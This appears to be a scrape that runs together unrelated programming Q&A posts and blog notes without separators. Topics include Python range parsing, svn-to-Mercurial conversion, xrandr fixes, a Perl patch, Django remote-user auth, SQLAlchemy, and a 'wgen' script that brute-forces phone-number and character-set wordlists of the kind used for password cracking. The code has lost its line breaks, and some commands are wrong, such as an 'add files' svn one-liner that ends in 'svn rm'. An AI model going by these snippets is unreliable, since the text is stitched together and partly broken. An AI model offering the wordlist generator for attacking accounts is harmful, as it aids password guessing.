I would like to be able to convert a string such as "1,2,5-7,10" to a python list such as [1,2,5,6,7,10]. I looked around and found this, but I was wondering if there is a clean and simple way to do this in Python. >>> def f(x): ... result = [] ... for part in x.split(','): ... if '-' in part: ... a, b = part.split('-') ... a, b = int(a), int(b) ... result.extend(range(a, b + 1)) ... else: ... a = int(part) ... result.append(a) ... return result ... >>> f('1,2,5-7,10') [1, 2, 5, 6, 7, 10] I was able to make a >>> def f(s): return sum(((list(range(*[int(j) + k for k,j in enumerate(i.split('-'))])) if '-' in i else [int(i)]) for i in s.split(',')), []) >>> f('1,2,5-7,10') [1, 2, 5, 6, 7, 10] >>> f('1,3-7,10,11-15') [1, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15] the other answer that pretended to have a comprehension was just a for loop because the final list was discarded. :) For python 2 you can even remove the call to This might be an overkill, but I just like pyparsing: def return_range(strg, loc, toks): if len(toks)==1: return int(toks[0]) else: return range(int(toks[0]), int(toks[1])+1) def parsestring(s): expr = Forward() term = (Word(nums) + Optional(Literal('-').suppress() + Word(nums))).setParseAction(return_range) expr << term + Optional(Literal(',').suppress() + expr) return expr.parseString(s, parseAll=True) if __name__=='__main__': print parsestring('1,2,5-7,10') Ugh, the answers are so verbose! Here is a short and elegant answer: def rangeString(commaString): def hyphenRange(hyphenString): x = [int(x) for x in hyphenString.split('-')] return range(x[0], x[-1]+1) return chain(*[hyphenRange(r) for r in commaString.split(',')]) Demo: >>> list( f('1,2,5-7,10') ) [1, 2, 5, 6, 7, 10] Easily modifiable to handle negative numbers or return a list. Also will need No comprehension beats mine! import re def convert(x): return sum((i if len(i) == 1 else list(range(i[0], i[1]+1)) for i in ([int(j) for j in i if j] for i in re.findall('(\d+),?(?:-(\d+))?', x))), []) The best part is that I use variable >>> convert('1,2,5-7,10') [1, 2, 5, 6, 7, 10] Very short, and elegant (imho): >>> txt = "1,2,5-7,10" >>> # construct list of xranges >>> xranges = [(lambda l: xrange(l[0], l[-1]+1))(map(int, r.split('-'))) for r in txt.split(',')] >>> # flatten list of xranges >>> [y for x in xranges for y in x] [1, 2, 5, 6, 7, 10]
How do I get numpy array into python list? looking for ('foo', 1, 2, 3, 4) series is a numpy array symbol = 'foo' def rowp (symbol,series): rowp=[] series = series[0:4] ss = series.tolist rowp.append(symbol) rowp.append(ss) print rowp I get error: ['foo', <built-in method tolist of numpy.ndarray object at 0x05D07D40>]
On a Lenovo Thinkpad the trackpad is the red button that acts as a mouse. To set the sensistivity and speed of your trackpad on for ubuntu/debian linux do (as root): echo -n 180 > /sys/devices/platform/i8042/serio1/speed echo -n 250 > /sys/devices/platform/i8042/serio1/sensitivity To have these applied every time you user the computer (probably what you want!) just add those two lines to /etc/rc.local before the final exit 0 so results looks like: echo -n 180 > /sys/devices/platform/i8042/serio1/speed echo -n 250 > /sys/devices/platform/i8042/serio1/sensitivity exit 0 I wanted to do a reverse proxy to wordpress.com in order to integrate an existing wordpress.com blog into an existing site. This turned out to be a little trickier than I’d thought due to wordpress.com’s usage of gzip deflation of their output. Figured this out thanks to sound advice here and here: ... <Proxy *> Allow from .mysite.com </Proxy> ProxyPass / myblog.wordpress.com ProxyPassReverse / http://myblog.wordpress.com/ ProxyHTMLURLMap http://myblog.wordpress.com/ / <Location /> SetOutputFilter proxy-html # get rid of Content-Encoding at wordpress end # To use this you'll need to do (on debian) a2enmod headers RequestHeader unset Accept-Encoding # Alternative method: inflate then deflate again ... (requires more effort at our end) # Could NOT get this to work (though suggested by both reference sites!) # SetOutputFilter INFLATE;proxy-html;DEFLATE </Location> .... Automatically Adding or Removing Files Especially useful when, for example, versioning /etc/: Files to remove: svn stat -q | grep '^!'svn stat -q | grep '^!' | sed -e 's/^!\s*//' | xargs | svn rm Files to add: svn stat | grep '^?'svn stat -q | grep '^?' | sed -e 's/^?\s*//' | xargs | svn rm find . -name 'dpkg-old' -exec rm -i {} \; Distributed versioning systems (VCMs) have now matured to the point that I’ve been planning to switch from subversion for quite a while — at least for own personal repositories where there are no coordination issues. Having chosen mercurial (hg) as my DVCM of choice the next step was to actually convert. While there is quite a bit of documentation on this topic available online I didn’t always find these had the necessary info. Combined with my experience of several ‘snags’ along the way I thought it worth documenting my experience in case it proves useful to others. I’d waited until hg 0.9.5 was available on my distro precisely because I wanted to use the hg convert functionality (alteratives such as tailor looked to have difficulties and though it turned out I could have used hgsvn without problem my original impression of it had been it was oriented for integration of hg and svn rather than straight conversion). Before I document the steps it is important to get clear one v. important thing about how hg works: There is no distinction between a working copy and a repository. In particular, each repository is a working copy and vice versa. The actual repo is stored inside the working copy at its root in a .hg directory. When you ‘checkout’ (svn terminology) you do so simply by ‘cloning’ an existing repository (or if just want a limited set of changes — e.g. those since you lasted ‘updated’ (svn terminology) you can do a ‘pull’). In fact you could even just make a plain copy that .hg directory and send it to someone — though obviously this might not work so well if you are moving between 2 OSs with different filesystems. Anyway, the main point to take from this is that the result of an hg convert will simply be a new directory with all the files (the working copy) plus a .hg directory in that directory (the repo). To convert all you do is:: $ hg convert <svn-repo-or-co> <some-new-directory> If you get weird errors while trying to convert (e.g. “Unknown Repository type”) then turn on debug to get more info: hg -v --debug convert SOURCE DEST (For example, in my case it turned out I hadn’t got the python svn bindings installed …) The devil however is in the detail: svn-repo-or-co can be the uri of a subversion repo or the path of a svn checkout. Where a checkout hg convert will just work out the source repo and pull from there Note however hg convert will not move across working copy files themselves. The obvious solution to this is to do the convert and then just move the .hg file across into your svn checkout and delete all the .svn directories (or vice-versa) some-new-directory: this is where the new hg repo/working copy with end up. After doing hg convert rather surprisingly all of the files in the new hg repository will be listed as ‘?’ (not tracked) when you do a hg status. To solve this just do a hg update To speed up conversions it is often worth getting a local copy of the subversion repo (to save pulling lots of stuff over the network connection). To do this either use svnsync or just dump the remote repo and load into a local one (if converting from a working copy you’ll then just need to do a svn switch --relocate My repository did not have a branches/tags/trunk layout (instead it has multiples subprojects …). This led to weird errors involving files and directories at the root of the repository which looked like: ‘hg convert abort: path contains illegal component’. I solved this by using the --filemap option to hg convert and putting explicit renames of the form: /root-path-1 root-path-1 in that file. What do you for all the other working copies once you have converted the repo/your working copy? This is now simple: Clone your hg repo to each of the machines with a working copy. (For this purpose you will probably want to make your original hg repo available over the Internet using either ssh or http protocols (for details see mercurial docs). Delete all wc files in this new hg repo Copy svn working files (just from trunk …) into this hg repo (alternatively do this the other way round and copy the relevant hg stuff .hg, .hgtags etc into the svn working copy …) Remove .svn directories: $ find . -name '\.svn' -exec rm -Rf {} \; Update inside the new hg repo: $ hg up I recently took delivery of a Novatech X40r system (Novatech are one of the few suppliers who allow me to get a machine without Windows). The most recent version of Ubuntu (Gutsy) installed without any issues — though I couldn’t quite seem to get the display resolution to match the screen resolution. Next step was to plug in my external monitor: nothing happened. This post quickly details how I got this fixed. Most of it is derived from an excellent post in the ubuntu forums [1] and this freedesktop bug post [2]. It is important to note that this may be specific to the graphic card being used: Intel GMA X3100 integrated graphics. [1] http://ubuntuforums.org/showpost.php?p=4003194&postcount=584 [2] http://bugs.freedesktop.org/show_bug.cgi?id=12229 Instructions For most part just follow the excellent instructions in [1]. Details of where these needed to be modded can be found below: STEP 1: my output from xrandr -q in step 1 was $ xrandr -q Screen 0: minimum 320 x 200, current 1280 x 800, maximum 1280 x 1280 VGA disconnected (normal left inverted right) LVDS connected 1280x800+0+0 (normal left inverted right) 304mm x 190mm 1280x800 59.9+ 60.0 1280x768 60.0 1024x768 60.0 800x600 60.3 640x480 59.9 TV connected 1024x768+0+0 (normal left inverted right) 0mm x 0mm 1024x768 30.0 800x600 30.0 848x480 30.0 640x480 30.0 As one can see there is this spurious TV entry. For the time being ignore this and proceed through the next steps. STEP 3: In step 3 nothing happened immediately and on manual activation I received an error: $ xrandr --output VGA --auto xrandr: cannot find crtc for output VGA My xrandr -q output was: $ xrandr -q Screen 0: minimum 320 x 200, current 1280 x 800, maximum 1280 x 1280 VGA connected (normal left inverted right) 1280x1024 59.9 1024x768 59.9 800x600 59.9 56.2 640x480 60.0 LVDS connected 1280x800+0+0 (normal left inverted right) 304mm x 190mm 1280x800 59.9+ 60.0 1280x768 60.0 1024x768 60.0 800x600 60.3 640x480 59.9 TV connected 1024x768+0+0 (normal left inverted right) 0mm x 0mm 1024x768 30.0 800x600 30.0 848x480 30.0 640x480 30.0 As one can see the new monitor is detected. After some Googling I came across [2]. This suggested there might be some conflict between the spurious TV entry and new monitor (essentially it appears the auto-detection code on some newish chipsets generates false-positives for the existence of a TV-out and this conflicts with activating additional monitors). I therefore did: $ xrandr --output TV --off Having done this activation of the new monitor worked: $ xrandr --output VGA --auto Even better the incorrect match of the display resolution to the screen resolution on the laptop went away suggesting that the existence of the TV item was also affecting the LVDS display. I record briefly my experience resolving this issue in case it helps others. As background I note that I use svk to allow local commit and replay for some of the subversion repos I use and over the last week I’d started encountering problems when trying to svk sync on one of these receiving the following error message: Bad URL passed to RA layer: Malformed URL for repository The solution to this is the following patch provided by Peter Werner to the svk-devel list a few days ago: -------------- next part -------------- --- SVN-Mirror-0.73.orig/lib/SVN/Mirror/Ra.pm 2007-03-19 23:59:12.000000000 +0100 +++ SVN-Mirror-0.73/lib/SVN/Mirror/Ra.pm 2007-10-07 08:37:36.000000000 +0200 @@ -168,6 +168,9 @@ $self->{config} ||= SVN::Core::config_get_config(undef, $self->{pool}); $self->{auth} ||= $self->_new_auth; + # escape URI (% is already escaped) + $arg{'url'} =~ s/([^-_:.%\/a-zA-Z0-9])/sprintf("%%%02X", ord($1))/eg if defined $arg{'url'}; + SVN::Ra->new( url => $self->{rsource}, auth => $self->{auth}, config => $self->{config}, In addition to this solution below I report the process by which I discovered it. I do this as it provides an interesting case study of the way that open source communities work, and particularly how ‘user-driven bug-fixing’ happens. Searching on the web turned up a variety of earlier reports [1][2][3] of this issue which it seemed related to having a spaces in svn url names (see [1.1] and [2] in particular). This seemed plausible as a source of the error as it occurred after someone had added a directory with spaces in it to the repository (a very rare occurrence). This issue did not seem to occur for all users and CLK (the maintainer) suggested upgrading SVN::Mirror to 0.73. [2.1] This I did but the bug was still there (as other users had noted [2.2]) however the source now seemed to be pinpointed as being in the SVN::Mirror perl module. Unfortunately I’m not a perl hacker … Finally a hand search of the svk lists turned up a post from less than a week ago [4] (obviously too recent for Google to have picked up yet as I had earlier done a specific search for the error name over the svk lists …). In addition to reporting the problem this mail provided a 2 liner patch to a specific perl module. I applied this patch, tried svk sync and hey presto! the bug was gone. The issue progressed from an unconfirmed one whose aetiology was unclear [1], to a confirmed one whose cause was fairly well known [2] (though not its source in code), solutions were suggested and tested by users [2.1, 2.2], the issue remained unresolved for several more months with the fix eventually provided by an independent user to the list [4]. It is also especially noteworthy that much of this tracking down was only possible because the software involved was open enabling users to poke around to see what was wrong. For example, tying the bug to spaces in the underlying repository url resulted from the original reporter of the issue hand-modifying a svn source file so as to make the error message more verbose [1.1] — something which is clearly only possible if the code is open. Much of this was inspired by this blog post. Having tested on my own set of files I would suggest that these methods could be ranked in order of accuracy as: TexCount.pl untex + wc wc pdf file wc $ wc -w file.tex This is very simple but is pretty inaccurate since wc has no awareness of tex commands or mathematics (which results in overcounting) and does not expand things like bibliographies (which results in undercounting). Overall the result is likely to be a substantial overcount. Look at the resulting pdf file. $ pdftotext file.pdf - | egrep -E '\w\w\w+' | iconv -f ISO-8859-15 -t UTF-8 | wc More sophisticated but in my experience results in grossly overestimated wordcounts due to inability to deal with mathematics and issues with pdftotext (lots of words get broken up that shouldn’t be). TexCount.pl Get it from: http://folk.uio.no/einarro/Comp/texwordcount.html This seemed to be pretty good. untex + wc $ untex file.tex | wc Again likely to overcount for mathematics and fairly limited removal of tex commands (though may undercount due to omission of citation/biblio type stuff). This is a simple hack to enable you to start OpenOffice and, more importantly, open documents with it from the command line. I’ve got the standard X port of OpenOffice 2.0 installed, so if you have something different you may need to change the path to soffice given below (to find soffice on your machine try from the command line $ locate soffice): First let’s make the script that starts openoffice available in a convenient way e.g. by symlinking into ~/bin or /usr/bin: $ cd ~/bin $ ln -s /Applications/OpenOffice.org\ 2.0.app/Contents/openoffice.org/program/soffice ./ Now you can do stuff like: $ soffice -help You’ll see there are different switches which allow you to start a text document, a spreadsheet etc. One annoyance to note is that if you get soffice to load a file by doing: $ soffice [options] ${filename} The application it will use (writer, calc, math …) will depend solely on the extension of the filename and will ignore any options you give it. So e.g. if you do: $ soffice -writer some.csv Then this will load in calc even though the -writer option was given. For more details (on this very old bug) see: http://www.openoffice.org/servlets/ReadMsg?list=allbugs&msgNo=94354 Fortunately this isn’t too much of a problem since the extension mapping is pretty reasonable. import readline readline.write_history_file('my_history.py') Have repository {start-repo} and want to merge into {old-repo} at {some-dir-name} # if you just wanted trunk replace with this # svndump {start-repo} | svndumpfilter include trunk svnadmin dump {start-repo} > my-dump # copy file to main server and change to web-user svnadmin load --parent-dir {some-dir-name} {old-repo} < my-dump
Do check out Oli's links. You basically see the authenticated username as verified by Basic HTTP Authentication in Django by looking at request.META['REMOTE_USER']. Update: Tested the proposed patch for ticket #689, which is available up-to-date in telenieko's git repository here. It applies cleanly at least on revision 9084 of Django. Activate the remote user authentication backend by adding the RemoteUserAuthMiddleware after AuthenticationMiddleware adding the setting AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.RemoteUserAuthBackend',) If you use lighttpd and FastCGI like I do, activate mod_auth, create credentials for a test user (I called it testuser and set 123 as the password) and configure the Django site to require basic authentication. The following urls.py can be used to test the setup: from django.conf.urls.defaults import * from django.http import HttpResponse from django.contrib.auth.models import User urlpatterns = patterns('', url(regex='^$', view=lambda request: HttpResponse(repr(request), 'text/plain')), url(regex='^user/$', view=lambda request: HttpResponse(repr(request.user), 'text/plain')), url(regex='^users/$', view=lambda request: HttpResponse( ','.join(u.username for u in User.objects.all()), 'text/plain')), ) After reloading lighty and the Django FCGI server, loading the root of the site now asks for authentication and accepts the testuser credentials, and then outputs a dump of the request object. In request.META these new properties should be present: 'AUTH_TYPE': 'Basic' 'HTTP_AUTHORIZATION': 'Basic dGVzdHVzZXI6MTIz' 'REMOTE_USER': 'testuser' The /user/ URL can be used to check that you're indeed logged in as testuser: <User: testuser> And the /users/ URL now lists the automatically added testuser (here the admin user I had created when doing syncdb is also shown): admin,testuser If you don't want to patch Django, it's trivial to detach the RemoteUserAuthBackend and RemoteUserAuthMiddleware classes into a separate module and refer to that in the Django settings.
What's the right way to join two queries on the same table data in SQLAlchemy? i.e I have a data class defined something like this: class DataMeasurement(Base): __tablename__ = 'DataMeasurement' id = Column(Integer, Sequence('data_measurement_id_seq'), primary_key=True) data_source = Column(String) timestamp = Column(DateTime) sensor_output = Column(Float) ...and I would like to join the following two queries where there are matching timestamps: q1 = self.session.query(DataMeasurement).filter_by(data_source='Sensor1').order_by(DataMeasurement.timestamp) q2 = self.session.query(DataMeasurement).filter_by(data_source='Sensor2').order_by(DataMeasurement.timestamp) # ...and now what? Is there a way to do this simply? ...or am I going about this in a fundamentally flawed way (I'm rather new to SQLAlchemy)?
I'm working on some code that generates all permutations of a given set of characters. Although my code works in Python 2.7 it no longer does in Python 3.x due to many changes in Strings. I'd like to adapt and since I'm new to Python, I was hoping you could give me a little push. =) My question is, as Python generates the word list of your choice, the output file size grows accordingly. I'd like you to show me how can I make this script check for a preset file size and if reached, open a new file and continue writing permutations. Example: numeric_lowercase.000001 numeric_lowercase.000002 numeric_lowercase.000003 Remember, I have looked at most examples on the site but they do not work with Python 3.2. Here's my Python 3.2 working code so far: import itertools import subprocess import os from string import digits, ascii_lowercase, ascii_uppercase, punctuation if os.name == 'nt': def clear_console(): subprocess.call("cls", shell=True) return else: def clear_console(): subprocess.call("clear", shell=True) return def generate_phone_numbers(area_code): f = open('phones.txt', 'w') for i in range(2010000, 9999999): f.write(area_code + str(i) + '\n') def generate_wordlist(lst_chars, min_digit, max_digit, lst_name): f = open(lst_name, 'w') for curr_length in range(min_digit, max_digit + 1): for curr_digit in itertools.product(lst_chars, repeat=curr_length): f.write(''.join(curr_digit) + '\n') print ('') print (' wgen - Menu') choice = 0 while int(choice) not in range(1,6): clear_console() choice = input(''' 1. Phone numbers for a given area code. 2. Numbers. 3. Numbers + Lowercase. 4. Numbers + Lowercase + Uppercase. 5. Numbers + Lowercase + Uppercase + Punctuation. Enter Option: ''') print ('') choice = int(choice) if choice == 1: area_code = input(''' Please enter Area Code: ''') area_code = str(area_code) area_code = area_code.strip() if len(area_code) == 3: print ('') print (' Generating phone numbers for area code ' + area_code + '.') print (' Please wait...') generate_phone_numbers(area_code) if choice == 2: min_digit = input(' What is the minimum size of the word? ') min_digit = int(min_digit) print ('') max_digit = input(' What is the maximum size of the word? ') max_digit = int(max_digit) chars = digits lst_name = 'numeric.txt' print ('') print (' Generating numbers between ' + str(min_digit) + ' and ' + str(max_digit) + ' digits.') print (' Please wait...') generate_wordlist(chars, min_digit, max_digit, lst_name) if choice == 3: min_digit = input(' What is the minimum size of the word? ') min_digit = int(min_digit) print ('') max_digit = input(' What is the maximum size of the word? ') max_digit = int(max_digit) chars = digits + ascii_lowercase lst_name = 'numeric_lowercase.txt' print ('') print (' Generating numbers & lowercase between ' + str(min_digit) + ' and ' + str(max_digit) + ' digits.') print (' Please wait...') generate_wordlist(chars, min_digit, max_digit, lst_name) if choice == 4: min_digit = input(' What is the minimum size of the word? ') min_digit = int(min_digit) print ('') max_digit = input(' What is the maximum size of the word? ') max_digit = int(max_digit) chars = digits + ascii_lowercase + ascii_uppercase lst_name = 'numeric_lowercase_uppercase.txt' print ('') print (' Generating numbers, lowercase & uppercase between ' + str(min_digit) + ' and ' + str(max_digit) + ' digits.') print (' Please wait...') generate_wordlist(chars, min_digit, max_digit, lst_name) if choice == 5: min_digit = input(' What is the minimum size of the word? ') min_digit = int(min_digit) print ('') max_digit = input(' What is the maximum size of the word? ') max_digit = int(max_digit) chars = punctuation lst_name = 'numeric_lowercase_uppercase_punctuation.txt' print ('') print (' Generating numbers, lowercase, uppercase & punctuation between ' + str(min_digit) + ' and ' + str(max_digit) + ' digits.') print (' Please wait...') generate_wordlist(chars, min_digit, max_digit, lst_name)